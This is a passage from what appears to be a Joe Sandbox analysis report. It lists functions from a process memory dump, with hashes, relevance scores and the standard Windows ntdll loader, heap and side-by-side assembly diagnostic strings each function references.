                                                                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                        • API String ID: 0-108210295
                                                                                                                        • Opcode ID: 703fc2b0abfbcb0eecb6646b464875b95fcf82f43e2777b268f36fdd59de9cfb
                                                                                                                        • Instruction ID: eb474a7f6a4ebc5f73c72e4733aec5834c6c38a144869176b9db2ecc8bf722ac
                                                                                                                        • Opcode Fuzzy Hash: 703fc2b0abfbcb0eecb6646b464875b95fcf82f43e2777b268f36fdd59de9cfb
                                                                                                                        • Instruction Fuzzy Hash: B9811539B44630BFDF259A189C49EBB7BB6EF46B10F014454F2096F292E3B58802DA71
                                                                                                                        Function 053B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-2160512332
                                                                                                                        • Opcode ID: ae51816b9040d8282b93f1db18f2e576f16e9be403129cc8c47144e5a3ca424c
                                                                                                                        • Instruction ID: fc47776948b712bb317cb0d996603b6b98dd6db5ddf3298dafae9faead95bbed
                                                                                                                        • Opcode Fuzzy Hash: ae51816b9040d8282b93f1db18f2e576f16e9be403129cc8c47144e5a3ca424c
                                                                                                                        • Instruction Fuzzy Hash: 6192CD75608341ABE725DE24C884FABB7E9FF84710F044A2DFA95D7A50D7B0E844CB92
                                                                                                                        Function 05368620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 053A54CE
                                                                                                                        • undeleted critical section in freed memory, xrefs: 053A542B
                                                                                                                        • 8, xrefs: 053A52E3
                                                                                                                        • double initialized or corrupted critical section, xrefs: 053A5508
                                                                                                                        • Critical section address., xrefs: 053A5502
                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 053A540A, 053A5496, 053A5519
                                                                                                                        • Thread identifier, xrefs: 053A553A
                                                                                                                        • corrupted critical section, xrefs: 053A54C2
                                                                                                                        • Address of the debug info found in the active list., xrefs: 053A54AE, 053A54FA
                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 053A5543
                                                                                                                        • Critical section address, xrefs: 053A5425, 053A54BC, 053A5534
                                                                                                                        • Critical section debug info address, xrefs: 053A541F, 053A552E
                                                                                                                        • Invalid debug info address of this critical section, xrefs: 053A54B6
                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 053A54E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                        • API String ID: 0-2368682639
                                                                                                                        • Opcode ID: 2cfdadee417d47e07622705a7f595e248ea9b0004b2273d7ef73a6d34842dce8
                                                                                                                        • Instruction ID: 3201dde8fcea38ec3b22125089c013c0b4781efc74aa6ff3f956fcdd4c880d31
                                                                                                                        • Opcode Fuzzy Hash: 2cfdadee417d47e07622705a7f595e248ea9b0004b2273d7ef73a6d34842dce8
                                                                                                                        • Instruction Fuzzy Hash: 02819AB1A00358AFDF24CFA4C845BAEFBBAFB48700F244519F905B7680D7B5A940DB64
                                                                                                                        Function 0534AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                        • API String ID: 0-3197712848
                                                                                                                        • Opcode ID: 43f3f0cc14f0eb1cd45bc3c235b369fe38a7c916b475d5e3d5e9697be68c1167
                                                                                                                        • Instruction ID: 487210dad8ab1147752216052bf191732b390681e846bf84945f4b014315995a
                                                                                                                        • Opcode Fuzzy Hash: 43f3f0cc14f0eb1cd45bc3c235b369fe38a7c916b475d5e3d5e9697be68c1167
                                                                                                                        • Instruction Fuzzy Hash: 811203B16083519BDB28DF28C854BBAB7E6FF85704F04491DF8858B290EB74E944CF62
                                                                                                                        Function 053E0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                        • API String ID: 0-1357697941
                                                                                                                        • Opcode ID: 194f58268e381adff161f1b878eaf6e0bd6af38e9ea22b4268a521a499e826c6
                                                                                                                        • Instruction ID: 6597d898b76b1631bb5a241551b0cb1b57c71f33e2c0998945575c7575a7c260
                                                                                                                        • Opcode Fuzzy Hash: 194f58268e381adff161f1b878eaf6e0bd6af38e9ea22b4268a521a499e826c6
                                                                                                                        • Instruction Fuzzy Hash: 98F11331A046A5EFCB29DF68C498BBAF7F5FF09700F088459E4829B6C1C7B4A945DB50
                                                                                                                        Function 053E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                        • API String ID: 0-1700792311
                                                                                                                        • Opcode ID: f6cfd4f1ad2912dba4a2d9d8a67595e0288f18c66743428c0a6aa4d51394cec2
                                                                                                                        • Instruction ID: 070913f67272c36745a3423bdeba8b4830fb4413ff27285ff2b5366a20e2258a
                                                                                                                        • Opcode Fuzzy Hash: f6cfd4f1ad2912dba4a2d9d8a67595e0288f18c66743428c0a6aa4d51394cec2
                                                                                                                        • Instruction Fuzzy Hash: F0D104316046A5DFCB2ADF68C459AADFBF2FF4A710F088059E446AB691C7B4E941CF10
                                                                                                                        Function 05362F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 053A2856
                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 053A28B2
                                                                                                                        • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 053A2881
                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 053A292E
                                                                                                                        • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 053A29AC
                                                                                                                        • @, xrefs: 05363180
                                                                                                                        • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 053A29B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                                                        • API String ID: 0-541586583
                                                                                                                        • Opcode ID: c5b2e862619bcaf962065b98e2a3a3dd6bedace8aac2700483c89485be807e00
                                                                                                                        • Instruction ID: 2a780d757a7ba1aad8e1f4f9f41cbc263940133ddb0b5b10f72328f61cb54e61
                                                                                                                        • Opcode Fuzzy Hash: c5b2e862619bcaf962065b98e2a3a3dd6bedace8aac2700483c89485be807e00
                                                                                                                        • Instruction Fuzzy Hash: B6C18F76E442299BDB319F15CC88BBAB7B9FF44710F0480E9E849AB250E7749E80CF55
                                                                                                                        Function 053B4DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ***Exception thrown within loader***, xrefs: 053B4E27
                                                                                                                        • LdrpGenericExceptionFilter, xrefs: 053B4DFC
                                                                                                                        • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 053B4E38
                                                                                                                        • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 053B4DF5
                                                                                                                        • LdrpProtectedCopyMemory, xrefs: 053B4DF4
                                                                                                                        • Execute '.cxr %p' to dump context, xrefs: 053B4EB1
                                                                                                                        • minkernel\ntdll\ldrutil.c, xrefs: 053B4E06
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                                        • API String ID: 0-2973941816
                                                                                                                        • Opcode ID: 294eb1a49e2ea34a3276f7b757ccf3695a5d434ca17b1d8ecc377bd7775fb3fa
                                                                                                                        • Instruction ID: 17ba8a14dd62a1624ad03833f3afb6e1f70acbfb49f5393aacf0e22f00e4fe05
                                                                                                                        • Opcode Fuzzy Hash: 294eb1a49e2ea34a3276f7b757ccf3695a5d434ca17b1d8ecc377bd7775fb3fa
                                                                                                                        • Instruction Fuzzy Hash: 1C213B762441047BFF2C9A6C8C49EB67B9EFB81950F140501F762ABD52C9E1D910C36D
                                                                                                                        Function 0533ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                        • API String ID: 0-4098886588
                                                                                                                        • Opcode ID: 1395bb38d18d7c0c094045515b6c405dafeca0f19101ae5ec3293b5d89c32ae1
                                                                                                                        • Instruction ID: 0bcc8eb9fb4e10d4561db9180564304ac4c5af25959d5ff62584e309c6b680f3
                                                                                                                        • Opcode Fuzzy Hash: 1395bb38d18d7c0c094045515b6c405dafeca0f19101ae5ec3293b5d89c32ae1
                                                                                                                        • Instruction Fuzzy Hash: 7A3280B1E042698BDF26CB14CCA9BEEF7BABF45340F1441E9E849A7250D7719E818F50
                                                                                                                        Function 053663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-792281065
                                                                                                                        • Opcode ID: 2a9e8e33352bd8813174f42c6796881b27af2efb8f8d7d4356d4f791c95e0013
                                                                                                                        • Instruction ID: 99b7b07835223d786aef6043fca5a06f3b7a685006cbb417a04e4eb6e6576b63
                                                                                                                        • Opcode Fuzzy Hash: 2a9e8e33352bd8813174f42c6796881b27af2efb8f8d7d4356d4f791c95e0013
                                                                                                                        • Instruction Fuzzy Hash: E6910231B043249BDF29DF14D84ABEA7BA5FF40B64F50812DE9026B685EBF49801C790
                                                                                                                        Function 05362CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 053A276F
                                                                                                                        • @, xrefs: 05362E4D
                                                                                                                        • .Local\, xrefs: 05362D91
                                                                                                                        • \WinSxS\, xrefs: 05362E23
                                                                                                                        • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 053A2706
                                                                                                                        • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 053A279C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                                        • API String ID: 0-3926108909
                                                                                                                        • Opcode ID: 47a8076961cb90203817318643c9b781e5a04c41c3d9aca0704c2c8bb18ed2f2
                                                                                                                        • Instruction ID: ed1b36024bac07ed270283bc68a66eabe5322b9fc87348d7ea993cb19bafbbb6
                                                                                                                        • Opcode Fuzzy Hash: 47a8076961cb90203817318643c9b781e5a04c41c3d9aca0704c2c8bb18ed2f2
                                                                                                                        • Instruction Fuzzy Hash: 5A81CCB96083029FDB21CF28C894A6BB7F9FF85700F05895DF895CB255D2B4D944CBA2
                                                                                                                        Function 0532645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • LdrpInitShimEngine, xrefs: 053899F4, 05389A07, 05389A30
                                                                                                                        • Getting the shim user exports failed with status 0x%08lx, xrefs: 05389A01
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 05389A11, 05389A3A
                                                                                                                        • apphelp.dll, xrefs: 05326496
                                                                                                                        • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 053899ED
                                                                                                                        • Loading the shim user DLL failed with status 0x%08lx, xrefs: 05389A2A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-204845295
                                                                                                                        • Opcode ID: 116d333c3f56943d0c03e43e1b590100bfeadf77c4f9da2edc70d8c07356534e
                                                                                                                        • Instruction ID: 87745dae322abd5fa2a52d4c2172fed89fdd5f48643ff51680a723f6329367c2
                                                                                                                        • Opcode Fuzzy Hash: 116d333c3f56943d0c03e43e1b590100bfeadf77c4f9da2edc70d8c07356534e
                                                                                                                        • Instruction Fuzzy Hash: 9E51D0322183149FD728EF24C886BBB77E9FF84A44F40491DF9869B150DA34E904CB92
                                                                                                                        Function 05362674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 053A2178
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 053A2165
                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 053A2160, 053A219A, 053A21BA
                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 053A219F
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 053A21BF
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 053A2180
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                        • API String ID: 0-861424205
                                                                                                                        • Opcode ID: a9d2198de1f3f1e18c9318fd998eb944eec1a85aed6ff8f33ba3fb314b98614b
                                                                                                                        • Instruction ID: 4d528fffb9a53a2dd0143a7467f9313c04089fdb4b06e454dcf896d658ba4e13
                                                                                                                        • Opcode Fuzzy Hash: a9d2198de1f3f1e18c9318fd998eb944eec1a85aed6ff8f33ba3fb314b98614b
                                                                                                                        • Instruction Fuzzy Hash: 0C31483EF4021477EB25CAA58C45F5F7779EB94A40F0A8059FA05AB245D6B09A00C7E1
                                                                                                                        Function 0536C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 053A8177, 053A81EB
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 053A8181, 053A81F5
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0536C6C3
                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 053A8170
                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 053A81E5
                                                                                                                        • LdrpInitializeProcess, xrefs: 0536C6C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                        • API String ID: 0-475462383
                                                                                                                        • Opcode ID: cc645ff42cbfbb238fc7214d988801331b75bc0d67dee68dfd8d1e802c36fd27
                                                                                                                        • Instruction ID: cd8d5c809dd96f3ddfc8edbf6fe71f0d681fb255a3637438785e18cb90fe3337
                                                                                                                        • Opcode Fuzzy Hash: cc645ff42cbfbb238fc7214d988801331b75bc0d67dee68dfd8d1e802c36fd27
                                                                                                                        • Instruction Fuzzy Hash: 0C3118727443559FC224EF28DD4AE2BB7A5FF84B10F044958FC85AB291EA60EC04C7A6
                                                                                                                        Function 0537096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 05372DF0: LdrInitializeThunk.NTDLL ref: 05372DFA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370BA3
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370BB6
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370D60
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1404860816-0
                                                                                                                        • Opcode ID: 0faad5bc47005fafc43e878294bdbba1a7f92f9f3b2733244bd55afc192c0952
                                                                                                                        • Instruction ID: 5d9f357e922dd40bcda5c763ab4d84fecacce0c51a9963159c93c564779e5650
                                                                                                                        • Opcode Fuzzy Hash: 0faad5bc47005fafc43e878294bdbba1a7f92f9f3b2733244bd55afc192c0952
                                                                                                                        • Instruction Fuzzy Hash: C7428C76A00709DFDB25CF24C884BAAB7F5FF04300F1445AAE989EB641D774AA84CF60
                                                                                                                        Function 053B4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                        • API String ID: 0-2518169356
                                                                                                                        • Opcode ID: 967419f5a1a76c5420e8627af64a70545dee5b1c9338b4844a7278513229b0f3
                                                                                                                        • Instruction ID: 692d3fabb2b4f3704cf922bb0432cf0878ae0e8515a1293fef00a8076b48f515
                                                                                                                        • Opcode Fuzzy Hash: 967419f5a1a76c5420e8627af64a70545dee5b1c9338b4844a7278513229b0f3
                                                                                                                        • Instruction Fuzzy Hash: 2891C072E006199BDB20CF68C880AFEB7B5FF49310F594169E915E7750E7B5DA01CB90
                                                                                                                        Function 0533A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                        • API String ID: 0-379654539
                                                                                                                        • Opcode ID: 7bf287c3c303204ed51c9daa6d17be65ce16c9887d41bcbb5b149989594333f1
                                                                                                                        • Instruction ID: dbcf66a7b085378c0f55bf1b975302b718cac80a4c783b1ad4d919dc0310f737
                                                                                                                        • Opcode Fuzzy Hash: 7bf287c3c303204ed51c9daa6d17be65ce16c9887d41bcbb5b149989594333f1
                                                                                                                        • Instruction Fuzzy Hash: 0EC18AB4208382DFDB15CF18C045B6AB7E9BF84704F00496AF8D68B750E774D949CB96
                                                                                                                        Function 05368402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 05368421
                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0536855E
                                                                                                                        • @, xrefs: 05368591
                                                                                                                        • LdrpInitializeProcess, xrefs: 05368422
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-1918872054
                                                                                                                        • Opcode ID: 48b1361098463ef002edbc5b8e2719b694cf45a9b9502bdeb0d0a947592f540c
                                                                                                                        • Instruction ID: 9679c0d1b12ebb157b4fe33ac0d1d00b1a935866d8e54536c177b2982ae2fbd1
